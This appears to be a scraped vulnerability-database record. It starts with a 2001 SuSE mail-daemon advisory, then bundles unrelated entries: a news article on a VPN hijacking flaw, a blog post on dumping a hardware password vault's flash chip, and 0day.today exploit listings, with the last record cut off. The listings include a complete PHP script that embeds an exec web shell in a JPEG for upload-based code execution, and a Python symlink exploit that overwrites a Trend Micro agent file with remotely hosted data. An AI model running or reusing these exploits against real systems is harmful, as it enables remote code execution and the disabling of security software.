ID SUSE-SA:2001:06 Type suse Reporter Suse Modified 2001-03-21T19:19:00
Description
The eMail access daemons imapd(8), ipop2d(8) and ipop3d(8) of SuSE 6.1 are vulnerable to several buffer overflows. Due to a misconfiguration these vulnerbilities could be triggered remotely after a user had been authenticated.
{"bulletinFamily": "unix", "hash": "980f99bcabb20eb55a9f7b359724608a5934763f5257991a4a9b77f43d076bf4", "id": "SUSE-SA:2001:06", "lastseen": "2016-09-04T11:21:38", "description": "The eMail access daemons imapd(8), ipop2d(8) and ipop3d(8) of SuSE 6.1 are vulnerable to several buffer overflows. Due to a misconfiguration these vulnerbilities could be triggered remotely after a user had been authenticated.", "objectVersion": "1.2", "cvelist": [], "viewCount": 3, "published": "2001-03-21T19:19:00", "href": "http://lists.opensuse.org/opensuse-security-announce/2001-03/msg00011.html", "references": [], "reporter": "Suse", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "title": "remote command execution in pop", "history": [], "modified": "2001-03-21T19:19:00", "enchantments": {"score": {"value": 4.1, "vector": "NONE", "modified": "2016-09-04T11:21:38"}, "dependencies": {"references": [{"type": "zeustracker", "idList": ["ZEUSTRACKER:IP", "ZEUSTRACKER:DOMAIN"]}, {"type": "hackread", "idList": ["HACKREAD:A30CCF4EB25F9A22272B650240A3F745", "HACKREAD:88C21A162233506FECD4DE8A1F3CE4DD", "HACKREAD:05884CA6BA0E955819C0DF6FC5FEABC2"]}, {"type": "jvn", "idList": ["JVN:89046645"]}, {"type": "threatpost", "idList": ["THREATPOST:C5C8575BBA8A982097567E3906CBC585", "THREATPOST:F8E40CE953E7B06C2A30BE461AE309C6", "THREATPOST:728B7B7DADCC6A87A1FC1388B993CC16"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:26E41CDD63099CCD1573FB00E53345FC"]}, {"type": "d0znpp", "idList": ["D0ZNPP:3F1EAA7673472FF56D4FCAC9354D181C"]}, {"type": "thn", "idList": ["THN:57D305F7A6E062E1DBDE22228481D711", "THN:AF2759606567B1C62B76706F16A896F2", "THN:6CAB25899790818F7BE75FBB1477A3EA"]}, {"type": "wired", "idList": ["WIRED:6873A690E14F93A04324F13CCEE7BAB8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:F892F69CEA5DFAA8DAAB800F02E48EB8", "MALWAREBYTES:AE04E2AD6972F792896F48328EC943C9"]}, {"type": "cisco", "idList": ["CISCO-SA-20190612-IOSXE-CSRF"]}, {"type": "mssecure", "idList": ["MSSECURE:3927DF6165C70804A2042AD0FC1210F7"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:7676A73FC7A006BE01E5B85BF31359BC"]}], "modified": "2016-09-04T11:21:38"}, "vulnersScore": 4.1}, "type": "suse", "affectedPackage": [{"arch": "i386", "packageFilename": "pop-2001.3.21-0.i386.rpm", "OSVersion": "6.1", "operator": "lt", "packageName": "pop", "packageVersion": "2001.3.21-0", "OS": "openSUSE"}, {"arch": "alpha", "packageFilename": "pop-2001.3.21-0.alpha.rpm", "OSVersion": "6.1", "operator": "lt", "packageName": "pop", "packageVersion": "2001.3.21-0", "OS": "openSUSE"}]}
{"thn": [{"lastseen": "2019-12-06T12:33:52", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-WMkBOTVhvWY/Xeo0rDTtwyI/AAAAAAAA17s/FVhvLMEY1qs7YWBRRvq_YhwWs1uqQpxjwCLcBGAsYHQ/s728-e100/linux-vpn-hacking.jpg>)\n\nA team of cybersecurity researchers has disclosed a new severe vulnerability affecting most Linux and Unix-like operating systems, including FreeBSD, OpenBSD, macOS, iOS, and Android, that could allow remote 'network adjacent attackers' to spy on and tamper with encrypted VPN connections. \n \nThe vulnerability, tracked as CVE-2019-14899, resides in the networking stack of various operating systems and can be exploited against both IPv4 and IPv6 TCP streams. \n \nSince the vulnerability does not rely on the VPN technology used, the attack works against widely implemented virtual private network protocols like OpenVPN, WireGuard, IKEv2/IPSec, and more, the researchers confirmed. \n\n\n \nThis vulnerability can be exploited by a network attacker \u2014 controlling an access point or connected to the victim's network \u2014 just by sending unsolicited network packets to a targeted device and observing replies, even if they are encrypted. \n \nAs explained by the researchers, though there are variations for each of the impacted operating systems, the vulnerability allows attackers to: \n \n\n\n * determine the virtual IP address of a victim assigned by the VPN server,\n * determine if there is an active connection to a given website,\n * determine the exact seq and ack numbers by counting encrypted packets and/or examining their size, and\n * inject data into the TCP stream and hijack connections.\n \n\n\n> \"The access point can then determine the virtual IP of the victim by sending SYN-ACK packets to the victim device across the entire virtual IP space,\" the team said in its [advisory](<https://seclists.org/oss-sec/2019/q4/122>).\n\n \n\n\n> \"When a SYN-ACK is sent to the correct virtual IP on the victim device, the device responds with a RST; when the SYN-ACK is sent to the incorrect virtual IP, nothing is received by the attacker.\"\n\n \nWhile explaining variations in the behavior of different operating systems, as an example, researchers said the attack does not work against macOS/iOS devices as described. \n \nInstead, an attacker needs to \"use an open port on the Apple machine to determine the virtual IP address.\" In their testing, the researchers use \"port 5223, which is used for iCloud, iMessage, FaceTime, Game Center, Photo Stream, and push notifications, etc.\" \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nThe researchers tested and successfully exploited the vulnerability against the following operating systems and the init systems, but they believe this list could go long as researchers test the flaw on more systems. \n \n\n\n * Ubuntu 19.10 (systemd)\n * Fedora (systemd)\n * Debian 10.2 (systemd)\n * Arch 2019.05 (systemd)\n * Manjaro 18.1.1 (systemd)\n * Devuan (sysV init)\n * MX Linux 19 (Mepis+antiX)\n * Void Linux (runit)\n * Slackware 14.2 (rc.d) \n * Deepin (rc.d)\n * FreeBSD (rc.d) \n * OpenBSD (rc.d)\n \n\"Most of the Linux distributions we tested were vulnerable, especially Linux distributions that use a version of systemd pulled after November 28th of last year, which turned reverse path filtering off,\" the researchers said. \n \n\"However, we recently discovered that the attack also works against IPv6, so turning reverse path filtering on isn't a reasonable solution.\" \n \nAs possible mitigation, researchers suggested to turn on reverse path filtering, implement bogon filtering, and encrypt packet size and timing to prevent attackers from making any inference. \n \nWhile the researchers have not yet revealed technical details of the vulnerability, they are planning to publish an in-depth analysis of this flaw and its related implications, after affected vendors, including Systemd, Google, Apple, OpenVPN, WireGuard, and different Linux distros issue satisfactory workarounds and patches.\n", "modified": "2019-12-06T11:26:06", "published": "2019-12-06T11:02:00", "id": "THN:FD10C34E4C222666AC0DBB5533C900AF", "href": "https://thehackernews.com/2019/12/linux-vpn-hacking.html", "type": "thn", "title": "New Linux Bug Lets Attackers Hijack Encrypted VPN Connections", "cvss": {"score": 0.0, "vector": "NONE"}}], "pentestpartners": [{"lastseen": "2019-12-06T14:27:06", "bulletinFamily": "blog", "description": "\n\n### TL:DR\n\nHardware security can be difficult to fathom, so I set out to research three password vaults as a newbie, sharing my findings.\n\nI picked three popular hardware vaults, each with different components, requiring different skills and equipment.\n\nHere's how I learned about disassembly, chipset research, understanding pinouts, protocols and breaking encryption. I hope it's useful!\n\n### Findings\n\nCredentials in plaintext. In a password vault. Yes really.\n\nCredentials that survive a hardware reset.\n\nReversible encryption.\n\nAnd plenty more!\n\n### Introduction\n\nI\u2019m Phil ([@Yekki_1](<https://twitter.com/Yekki_1>)), this is my first blog for PTP and my first hardware hacking project. I am lucky enough to be part of the [PTP Academy](<https://www.pentestpartners.com/about-us/ptp-academy/>) which gives me the opportunities to discover different areas of infosec. Up front I\u2019d like to thank the PTP hardware team ([@tautology](<https://twitter.com/tautology0>), [@cybergibbons](<https://twitter.com/cybergibbons>), and [@iskuri1](<https://twitter.com/Iskuri1>)) who gave guidance and taught me some of the more technical details.\n\nThis series of blogs will go through the basics of hardware hacking, including the stages of a hardware test, identifying chips, continuity tests and ultimately reading data directly from the chips on the board. I will be doing these basics with 3 standalone password vaults, each with different chipsets and intricacies.\n\nThe three devices which were tested are:\n\n**RecZone Password Safe**\n\n\n\n * Identifying components and understanding datasheets\n * Dumping SPI flash using a Raspberry Pi\n * Reading the plain text data dump\n\n**PasswordFast**\n\n\n\n * Undertaking continuity test to confirm pinouts\n * Investigating Microcontrollers\n * Recognising encrypted data and realising the right time to stop\n\nFull post here: [Hacking Hardware Password Managers: passwordsFAST](<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-passwordsfast/>)\n\n**Vault Password Keeper**\n\n\n\n * Learning about CMOS flash and required hardware\n * Fully destructive methods of removing chips from the board\n * Using cryptoanalysis to decode stored data\n\nFull post: [Hacking Hardware Password Managers: Royal Vault Password Keeper](<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-royal-vault-password-keeper/>)\n\nAll these devices have a passcode to secure the device and the ability to add in the URL, username and password for each site. However one thing I did find consistent across all devices is the keyboard is hard to use and doesn\u2019t encourage strong, complicated passwords.\n\n### Device set up\n\nThe first device is the RecZone Password Safe.\n\n\n\nThe first step of any hardware job is to add data onto the device, it\u2019s important to add in a variety of data and can be beneficial to do lots of repeating letters and all possible characters, this will make it easier later on to identify the added data and helps with any decryption that might be required.\n\n\n\nOnce the data has been added, the next step is to get the case off and see what\u2019s underneath. For this device there were 4 rubber feet under which were the screws that held the case together.\n\n\n\nRemoving the screws and getting the back off, the board becomes exposed and is a straightforward board.\n\n### Initial Inspection\n\nThe next step is a visual inspection of the board, working out what the board contains and which parts are of interest.\n\nStarting with the back of the board:\n\n\n\nThis is a basic board with only a few components, there are connections to other parts of the device, including the battery (blue square), screen backlight (purple square) and reset button (green square). The part I was most interested in was the 8pin flash chip in the red square.\n\nThe flash chip is normally the storage on a device, so this is where our passwords are likely to be stored.\n\nMany chips can be identified by the text that appears on the top of them:\n\n\n\nThis chip is a 25Q40CT. Doing an internet search for this code, I was able to find the [datasheet](<https://html.alldatasheet.net/html-pdf/1151520/GIGADEVICE/GD25Q40CTEG/3543/5/GD25Q40CTEG.html>) which will be needed after the initial inspection is finished.\n\nWhat I wasn\u2019t able to identify on the back of the board was a microcontroller, effectively the brains behind the device.\n\nThe top of the board was interesting as there were a lot of connections and what are known as \u201cvias\u201d, these provide a direct connection between the different layers of the board, this board only has 2 layers, so it\u2019s a connection between the front and the back.\n\n\n\nIt is likely that these connect into something on the front of the board.\n\n\n\nThe front of the board has the keyboard connections. These types of connectors work by when the button is pressed, the metal circuit for each key is completed which sends a signal to the processor.\n\nThe backlight for the screen is connected by the wires on the right hand side, it is unlikely that all the vias on the back are for the screen.\n\nPrising the screen off was possible with a bit of force, however it is very destructive and it turned out to be near impossible to properly reconnect it to re-use the device. It\u2019s worth having spare devices when reverse engineering!\n\n\n\nThe screen was connected to the rails on the top and bottom allowing the display to work. A number of the vias however are used for the chip that was under the screen. This is a common thing nicknamed \u201cblob on board\u201d. It is done as a cost saving measure and although it can be removed, it\u2019s dangerous with a high risk of damage to the chip.\n\nFor an introduction I decided that trying to remove the epoxy was out of scope. Instead I decided to focus on the flash memory.\n\n### Chipset\n\nThis is where the [datasheet](<https://html.alldatasheet.net/html-pdf/1151520/GIGADEVICE/GD25Q40CTEG/3543/5/GD25Q40CTEG.html>) comes in handy. The chip is SPI flash, which is a common storage solution for small devices. The datasheet gives all the information about the chip, including which pin is for which function. This is critical to be able to read the data successfully.\n\nThe datasheet confirmed that the required voltage for the chip is 2.7~3.6V which means it was possible to power it up through a Raspberry Pi.\n\n### Continuity Testing\n\nTo confirm the information on the datasheet I undertook a continuity test. This test uses a multimeter to check connectivity between two pins. Simply set the multimeter to continuity mode:\n\n\n\nThis mode beeps when a circuit is made. On the board there was a ground testing pin, so putting one probe on that and the other on pin 4 of the chip, a circuit should be completed.\n\n\n\nThe reading on the multimeter shows that a circuit was successfully created, therefore I was confident that I knew the pin layout for the chip.\n\n### Connecting it up\n\nUsing the datasheet the pinout can be compared against the raspberry pi SPI pins. The pins for the chip are:\n\n\n\nThe names of the pins didn\u2019t tie up with the raspberry pi pins, so I had to find out what each pin was:\n\n * Vss \u2013 This is the main ground connection\n * Vcc \u2013 This is the power for the chip\n * CS# - Chip select \u2013 also known as slave select or (chip) enable it allows the selection of an integrated circuit out of several connected over the same bus. The chip on the board is the slave and what we read it from is the master.\n * SO/IO1 \u2013 Data Output. This is the pin we will use the read the data from the chip.\n * WP#/IO2 \u2013 Write protect input. Due to the fact we are reading, we might only have to write a single bit so this pin may not need to be connected.\n * Hold#/IO3 \u2013 Hold input. Again, we are mostly reading, so this pin might not be needed.\n * SCLK \u2013 This is the clock.\n * SI/IO0 \u2013 Data Input. As we will need to write a bit before we can read, this will be required to allow that write function.\n\nThe SPI specific pins on the raspberry pi are:\n\n\n\nThe key thing with SPI flash is that the MOSI (master output slave input) goes to SI (slave in) and MISO (master input slave output) goes to SO (slave out). The controller is the master and the flash chip is the slave. Normally when the chip is powered the MCU would be the master, however because I can connect and power the device through the chip, this lets the Pi interact with chip before the MCU can, resulting in the Pi becoming the master.\n\nConnecting the PI and the chip results in this wiring:\n\nThese connections allowed the chip to be powered without powering the rest of the board, the ground to be connected and the appropriate pins set up for reading the data.\n\nI used a clip to connect up the chip. If you don\u2019t have a clip it is possible to use grabbers to connect to each leg individually, however these make the entire process a lot more difficult.\n\n\n\nWhen connected, the pi was able to read the data. My pi was set up to have a static IP address and connected to a VM via a USB ethernet adapter allowing SSH access into the pi.\n\nTo read the data the pi needed the SPI interfaces enabled which is done via the raspi-config options\n\n_sudo raspi-config_\n\n\n\n### Dumping the Data\n\nI was able to confirm that the chip was wired up properly using a program called flashrom:\n\n_sudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=1000_\n\n\n\nThe program was able to detect the chip as a GigaDevice flash chip \u201cDG25Q40(B)\u201d. This meant that the chip was connected up properly and the data could be read off it.\n\nTo dump the data I appended the read flag and specified a file to output the data too.\n\n_sudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=1000 -r dump.bin_\n\n\n\nWhen the done message appeared, I knew that the data had been read. This however, wasn\u2019t the end of the job.\n\n### Reading the data\n\nThe next step was to see what data was on the chip. To read the data I used a program called hexdump:\n\n_hexdump -C dump.bin_\n\n\n\nI could not believe it, the data was stored on the chip, in plain text! These are the details that I input into the device at the start of this process.\n\nThis data should be encrypted as an absolute minimum for this\u2026 But it gets worse, I used the reset on the device and was asked to set a new master pin (as I had to at the very first bootup). I then re-dumped the chip:\n\n\n\nThe data was still there!\n\nWhat this means is if a user presses the reset button and sells the device, all of their passwords can still be read in plain text directly off the chip.\n\nThat is absolutely nuts!\n\nOn the second dump of the data I also found this:\n\n\n\nThis is the master 4 digit pin that I set after the reset. Again in plain text!\n\nSomeone using a device like this, hopefully wouldn\u2019t have password reuse, but it\u2019s not out of the realms of possibility, especially if it\u2019s a 4 digit code similar to things like, their phone pin, or their bank card.\n\nThere might have been a software based reset, rather than the hardware reset button which I would have liked to have tested but unfortunately I removed the screen too early which turned out to be fully destructive. This was a very valuable lesson I learnt about starting with the least destructive methods and only moving to most destructive once all other avenues have been looked at.\n\nWe reached out to the manufacturer of the device to inform them of this security vulnerability, however we did not receive any acknowledgement back from them.\n\nThis has been a very interesting first look into hardware hacking, I have learnt a lot from this device, including the process and the importance of not doing fully destructive testing until all other tests have been completed.\n\nIt did make me wonder though, what could they have done differently and have the other devices secured the data better?\n\nPart 2 of this series will look at [the PasswordFast device](<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-passwordsfast/>) and will show an almost entirely different set of hardware to do a very similar job.\n\nFor reference here are the links to all three hacking hardware password manager posts: \n<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-the-reczone/> \n<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-passwordsfast/> \n<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-royal-vault-password-keeper/>", "modified": "2019-12-06T08:59:18", "published": "2019-12-06T08:59:18", "id": "PENTESTPARTNERS:7EAFACA4994042C9A2F94B2BE5060993", "href": "https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-the-reczone/", "type": "pentestpartners", "title": "Hacking Hardware Password Managers: The RecZone", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2019-12-06T13:54:54", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33628", "href": "https://0day.today/exploit/description/33628", "title": "Verot 2.0.3 - Remote Code Execution Exploit #RCE", "type": "zdt", "sourceData": "# Exploit Title: Verot 2.0.3 - Remote Code Execution\r\n# Date: 2019-12-05\r\n# Exploit Author: Jinny Ramsmark\r\n# Vendor Homepage: https://www.verot.net/php_class_upload.htm\r\n# Software Link: https://github.com/verot/class.upload.php\r\n# Version: <=2.0.3\r\n# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41\r\n# CVE : CVE-2019-19576\r\n\r\n<?php\r\n#Title: jpeg payload generator for file upload RCE\r\n#Author: Jinny Ramsmark\r\n#Github: https://github.com/jra89/CVE-2019-19576\r\n#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576\r\n#Usage: php inject.php\r\n#Output: image.jpg.phar is the file to be used for upload and exploitation\r\n\r\n#This script assumes no special transforming is done on the image for this specific CVE.\r\n#It can be modified however for different sizes and so on (x,y vars).\r\n\r\nini_set('display_errors', 1);\r\nerror_reporting(E_PARSE);\r\n#requires php, php-gd\r\n \r\n$orig = 'image.jpg';\r\n$code = '<?=exec($_GET[\"c\"])?>';\r\n$quality = \"85\";\r\n$base_url = \"http://lorempixel.com\";\r\n \r\necho \"-=Imagejpeg injector 1.7=-\\n\";\r\n \r\ndo\r\n{\r\n $x = 100;\r\n $y = 100;\r\n $url = $base_url . \"/$x/$y/\";\r\n \r\n echo \"[+] Fetching image ($x X $y) from $url\\n\";\r\n file_put_contents($orig, file_get_contents($url));\r\n} while(!tryInject($orig, $code, $quality));\r\n \r\necho \"[+] It seems like it worked!\\n\";\r\necho \"[+] Result file: image.jpg.phar\\n\";\r\n \r\nfunction tryInject($orig, $code, $quality)\r\n{\r\n $result_file = 'image.jpg.phar';\r\n $tmp_filename = $orig . '_mod2.jpg';\r\n \r\n //Create base image and load its data\r\n $src = imagecreatefromjpeg($orig);\r\n\r\n imagejpeg($src, $tmp_filename, $quality);\r\n $data = file_get_contents($tmp_filename);\r\n $tmpData = array();\r\n\r\n echo \"[+] Jumping to end byte\\n\";\r\n $start_byte = findStart($data);\r\n \r\n echo \"[+] Searching for valid injection point\\n\";\r\n for($i = strlen($data)-1; $i > $start_byte; --$i)\r\n {\r\n $tmpData = $data;\r\n for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)\r\n {\r\n $tmpData[$n] = $code[$z];\r\n }\r\n \r\n $src = imagecreatefromstring($tmpData);\r\n imagejpeg($src, $result_file, $quality);\r\n \r\n if(checkCodeInFile($result_file, $code))\r\n {\r\n unlink($tmp_filename);\r\n unlink($result_file);\r\n sleep(1);\r\n \r\n file_put_contents($result_file, $tmpData);\r\n echo \"[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\\n\";\r\n \r\n sleep(1);\r\n $src = imagecreatefromjpeg($result_file);\r\n \r\n return true;\r\n }\r\n else\r\n {\r\n unlink($result_file);\r\n }\r\n }\r\n unlink($orig);\r\n unlink($tmp_filename);\r\n return false;\r\n}\r\n \r\nfunction findStart($str)\r\n{\r\n for($i = 0; $i < strlen($str); ++$i)\r\n {\r\n if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)\r\n {\r\n return $i+2;\r\n }\r\n }\r\n \r\n return -1;\r\n}\r\n \r\nfunction checkCodeInFile($file, $code)\r\n{\r\n if(file_exists($file))\r\n {\r\n $contents = loadFile($file);\r\n }\r\n else\r\n {\r\n $contents = \"0\";\r\n }\r\n \r\n return strstr($contents, $code);\r\n}\r\n \r\nfunction loadFile($file)\r\n{\r\n $handle = fopen($file, \"r\");\r\n $buffer = fread($handle, filesize($file));\r\n fclose($handle);\r\n \r\n return $buffer;\r\n}\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33628"}, {"lastseen": "2019-12-06T16:00:40", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33630", "href": "https://0day.today/exploit/description/33630", "title": "Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite Exploit", "type": "zdt", "sourceData": "# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite\r\n# Exploit Author : Peter Lapp\r\n# Vendor Homepage : https://www.trendmicro.com/en_us/business.html\r\n# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716\r\n# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.\r\n# CVE: 2019-15627\r\n\r\n# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)\r\n\r\n# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )\r\n# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)\r\n# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, \r\n# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. \r\n\r\n# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.\r\n# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.\r\n# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. \r\n# So the attacker can host a \"malicious\" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, \r\n# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, \r\n# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that \r\n# are ripe for the writing that can then point to a malicious binary.\r\n\r\n# Usage:\r\n# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. \r\n# 2. Open a browser (preferrably IE) and start the script\r\n# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).\r\n# 4. Keep refreshing the page until you see the script create the target file overwritten.\r\n#\r\n# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. \r\n\r\n\r\nimport time\r\nimport os\r\nimport subprocess\r\nimport sys\r\nimport webbrowser\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\nclass Stage1_Handler(FileSystemEventHandler):\r\n\tdef __init__(self):\r\n\t\tself.filenames = []\r\n\tdef on_created(self, event):\r\n\t\tfilename = os.path.basename(event.src_path)\r\n\t\tif filename in self.filenames:\r\n\t\t\tprint ('Starting symlink creation.')\r\n\t\t\twatcher1.stop()\r\n\t\t\tsymlinkery(self.filenames)\r\n\t\telse:\r\n\t\t\tself.filenames.append(filename)\r\n\t\t\tprint ('File %s created.') % filename\r\n\t\t\t\r\nclass Stage2_Handler(FileSystemEventHandler):\r\n\tdef on_any_event(self, event):\r\n\t\tif os.path.basename(event.src_path) == 'dsa_control.cmd':\r\n\t\t\tprint \"Target file overwritten/deleted. Cleaning up.\"\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM CreateSymlink.exe\", shell=True)\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM Baitandswitch.exe\", shell=True)\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\\"')\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\test\"')\r\n\t\t\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp')\r\n\t\t\twatcher2.stop()\r\n\t\t\tsys.exit(0)\r\n\t\t\t\r\nclass Watcher(object):\r\n\tdef __init__(self, event_handler, path_to_watch):\r\n\t\tself.event_handler = event_handler\r\n\t\tself.path_to_watch = path_to_watch\r\n\t\tself.observer = Observer()\r\n\tdef run(self):\r\n\t\tself.observer.schedule(self.event_handler(), self.path_to_watch)\r\n\t\tself.observer.start()\r\n\t\ttry:\r\n\t\t\twhile True:\r\n\t\t\t\ttime.sleep(1)\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tself.observer.stop()\r\n\r\n\t\tself.observer.join()\r\n\tdef stop(self):\r\n\t\tself.observer.stop()\r\n\t\t\r\ndef symlinkery(filenames):\r\n\tprint \"Enter symlinkery\"\r\n\tfor filename in filenames:\r\n\t\tprint \"Creating symlink for %s\" % filename\r\n\t\tcmdname = \"start cmd /c CreateSymlink.exe \\\"C:\\\\test\\\\virus\\\\%s\\\" \\\"C:\\\\test\\\\test\\\\symtarget\\\"\" % filename\r\n\t\tsubprocess.Popen(cmdname, shell=True)\r\n\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig')\r\n\tos.system('mklink /J \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\" C:\\\\test')\r\n\twatcher2.run()\r\n\tprint \"Watcher 2 started\"\r\n\r\ntry:\r\n os.mkdir('C:\\\\test')\r\nexcept:\r\n pass\r\n\r\npath1 = 'C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\virus'\r\npath2 = 'C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\'\r\nwatcher1 = Watcher(Stage1_Handler,path1)\r\nwatcher2 = Watcher(Stage2_Handler,path2)\r\nswitcheroo = \"start cmd /c BaitAndSwitch.exe C:\\\\test\\\\test\\\\symtarget \\\"C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\dsa_control.cmd\\\" \\\"C:\\\\windows\\\\temp\\\\deleteme.txt\\\" d\"\r\nsubprocess.Popen(switcheroo, shell=True)\r\nwatcher1.run()\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33630"}, {"lastseen": "2019-12-06T16:00:45", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33631", "href": "https://0day.today/exploit/description/33631", "title": "BeeGFS 7.1.3 Privilege Escalation Vulnerability", "type": "zdt", "sourceData": "============================================\r\nBeeGFS Privilege Escalation (CVE-2019-15897)\r\n============================================\r\n\r\n* Software: BeeGFS\r\n* Affected Versions: All versions upto and including 7.1.3\r\n* Vendor: ThinkparQ\r\n* CVE: CVE-2019-15897\r\n* Severity: CVSS 9.6 (Critical) [CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H]\r\n* Author: John Fitzpatrick\r\n* Date: 2019-12-04\r\n\r\n\r\nDescription\r\n===========\r\n\r\nBeeGFS is a \"leading parallel cluster filesystem\", used in many HPC environments. A vulnerability exists in a default installation of BeeGFS which allows users to perform operations which allow them to elevate their privileges and become root. This is due to a failure to properly authenticate a user when performing filesystem operations. BeeGFS deployments utilising the BeeGFS cloudformation template were also affected by this issue.\r\n\r\nInstallations which are making use of connection-based authentication, using the \u201cconnAuthFile\u201d option to specify a shared key, are not affected by this issue if the shared key is only readable by root. Without a connAuthFile configured any host able to communicate with the BeeGFS cluster can become part of the cluster and mount the BeeGFS filesystem.\r\n\r\nIn order to resolve this issue BeeGFS users should configure connection-based authentication within their environment ensuring that the shared key is only readable by root. This will prevent non root users from exploiting this issue but will prevent non-root users from utilising utilities such as beegfs-ctl.\r\n\r\n\r\nSolution / Workaround\r\n=====================\r\n\r\nThis vulnerability can be mitigated by making use of the connAuthFile configuration option. This option, whilst intended to restrict which hosts can communicate with BeeGFS, can also be leveraged to prevent non root users from gaining root as a result of this weakness. This is done by setting the path to a shared key within the BeeGFS configuration file on each node. An example of this is shown below:\r\n\r\n connAuthFile = /etc/beegfs/connauthfile\r\n\r\nThe contents of the connAuthFile can be anything but must be the same on each host as this is a shared key. If this key is readable by non-root users then it will be ineffective in preventing the attacks described above (although hosts without access to the key from joining the cluster), the key must be configured readable only by root:\r\n\r\n $ ls -la /etc/beegfs/connauthfile \r\n -rw------- 1 root root 640 Aug 28 02:29 /etc/beegfs/connauthfile\r\n\r\nWith the connAuthFile option configured BeeGFS will derive a 64 bit key from the file containing the secret and this value is used to authenticate the communication channels when they are initially established as well as any subsequent communication channels.\r\n\r\nWhen configured communications which have not first authenticated with this key are ignored and silently dropped by the BeeGFS cluster.\r\nThis mitigation does prevents non-root users from using any BeeGFS utilities (beegfs-ctl, beegfs-check-servers, etc.).\r\n\r\nNo specific fix has been provided by BeeGFS for this vulnerability, therefore updating versions of BeeGFS will (currently) not resolve this issue. The workaround described above is the official supported recommendation from BeeGFS.\r\n\r\nThe BeeGFS cloudformation templates have been updated in order to make use of a shared key.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2019-08-23: Issue reported to ThinkparQ\r\n2019-08-26: Acknowledgement from ThinkparQ\r\n2019-09-05: Details of proposed remediation from ThinkparQ and proposed disclosure date\r\n2019-11-17: HPCsec pre-advisory published\r\n2019-11-19: Confirmation that cloudformation templates have been updated\r\n2019-12-04: Advisory published\r\n\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33631"}, {"lastseen": "2019-12-06T16:00:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-12-06T00:00:00", "published": 